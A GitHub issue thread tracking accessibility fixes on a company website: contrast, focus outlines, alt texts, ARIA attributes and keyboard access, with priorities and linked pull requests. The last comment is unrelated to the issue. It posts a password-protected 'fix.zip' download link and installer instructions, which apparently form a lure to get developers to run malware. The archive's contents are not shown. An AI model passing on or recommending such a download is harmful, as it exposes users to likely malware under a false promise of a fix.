### ISSUE TITLE
Accessibility Issues Overview

### ISSUE THREAD

**Issue by hofmann-felix** [satellytes/satellytes.com#802]
# Priority

- 🔴 High Priority
- 🟡 Moderate Priority
- 🟢 Low Priority

# General Issues

- [x] 🔴 **Breadcrumb**: Background and foreground colors do not have a sufficient contrast ratio. ([WCAG Reference](https://www.w3.org/WAI/WCAG21/Understanding/contrast-minimum.html))
    - **Proposed Solution:** Make the Breadcrumbs darker and check if the result matches with https://contrastchecker.com/
    - **PR**: https://github.com/satellytes/satellytes.com/pull/805
- [ ] 🔴 **Focus Outline** is cut of in many places
    <img width="306" alt="Bildschirmfoto 2024-08-23 um 17 08 47" src="https://github.com/user-attachments/assets/cc90a57e-c87c-467c-a030-55afcbc628e8">
    - **PR**: https://github.com/satellytes/satellytes.com/pull/805
    - Not fixed in:
        - TeaserContainer
- [ ] 🔴 **Images:** Provide useful alt texts
    - **Description:** We have set `alt=“”` for almost all images so that they are ignored by the screen reader. However, these images often offer added value and should therefore not be ignored. The alt text should be set for these images
    - **Assignee:** @hofmann-felix 
- [x] 🔴 **Legal Links:** Add `<nav>` tag to “Data Protection” & “Imprint” in the Menu
    - **PR**: https://github.com/satellytes/satellytes.com/pull/806
- [x] 🔴 **Navigation:** LinkedIn & GitHub Links aren’t highlighted on keyboard focus
    - **PR**: https://github.com/satellytes/satellytes.com/pull/810
- [x] 🔴 **Navigation: Add** `[aria-hidden="true"]` to flyout when it is visually hidden
    - **PR**: https://github.com/satellytes/satellytes.com/pull/811
- [x] 🔴 **Navigation:** Other content should not be focusable when the flyout is active ([WCAG Refernce](https://www.w3.org/WAI/WCAG22/Understanding/focus-order#:~:text=A%20Web%20page%20implements%20modal,the%20element%20following%20the%20button))
    - - **PR**: https://github.com/satellytes/satellytes.com/pull/829
- [x] 🟡 **Breadcrumbs:** Add `aria-label="Breadcrumbs"` and `role=”navigation”` to breadcrumb container ([WAI-ARIA Reference](https://www.w3.org/WAI/ARIA/apg/patterns/breadcrumb/examples/breadcrumb/))
    - **PR**: https://github.com/satellytes/satellytes.com/pull/805
- [ ] 🟢 **Hero Images**: Background and foreground colors do not have a sufficient contrast ratio. ([WCAG Reference](https://www.w3.org/WAI/WCAG21/Understanding/contrast-minimum.html))
    - **Proposed Solution:** Make the background image darker and check if the result matches with https://contrastchecker.com/
    - Note: automated checkers use the background color of the whole page to compare it to which results in an insufficient contrast ratio. The actual visible colors have a WCAG compliment color ratio.
- [x] 🟢 **Navigation:** Language switch chevron should be `aria-hidden: true`
    - **PR**: https://github.com/satellytes/satellytes.com/pull/833

# Page Specific Issues

## Careers

- [x] 🟡 **Accordion elements:** Hide chevron from screen readers
    - **PR**: https://github.com/satellytes/satellytes.com/pull/815
- [x] 🟢 **Accordion elements**: `aria-describedby` and `aria-labeledby` attributes should be connected by ID to an element that either has text description or an "aria-label" attribute.
    - **PR**: https://github.com/satellytes/satellytes.com/pull/834

## Career Details

- [x] 🔴 **Privacy checkbox** is not keyboard accessible
    - **PR**: https://github.com/satellytes/satellytes.com/pull/816
- [x] 🟡 **Form Fields:** The validity status of every form element must be represented in the code at all times using the "aria-invalid" attributes and the "true/false" values, and change dynamically when the status changes 
    - **PR**: https://github.com/satellytes/satellytes.com/pull/817
- [x] 🟢 **Form Fields:** `aria-describedby` and `aria-labeledby` attributes should be connected by ID to an element that either has text description or an "aria-label" attribute.
    - **PR**: https://github.com/satellytes/satellytes.com/pull/817

## Blog Overview

- [x] 🔴 **Pagination buttons** don’t work with keyboard 
    - **PR**: https://github.com/satellytes/satellytes.com/pull/812

## Blog Post

- [x] 🔴 **Social Buttons and Copy Code Button** do not have an accessible name
    - **PR**: https://github.com/satellytes/satellytes.com/pull/814
- [x] 🔴 **RSS Feed Button** is `<li>` without `<ul>`, `<ol>` or `<menu>` parent elements.
    - **PR**: https://github.com/satellytes/satellytes.com/pull/798
- [x] 🟡 **Code Snippets**: Background and foreground colors do not have a sufficient contrast ratio. ([WCAG Reference](https://www.w3.org/WAI/WCAG21/Understanding/contrast-minimum.html))
    - **Things to consider**: check if the result matches with https://contrastchecker.com/
    - **PR**: https://github.com/satellytes/satellytes.com/pull/820
- [x] 🟡 **Links** that open in a new tab or a new window should either have an "aria-label" attribute or a screen-reader only element explaining to screen-readers that this opens in a new tab.
    - **PR**: https://github.com/satellytes/satellytes.com/pull/821

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
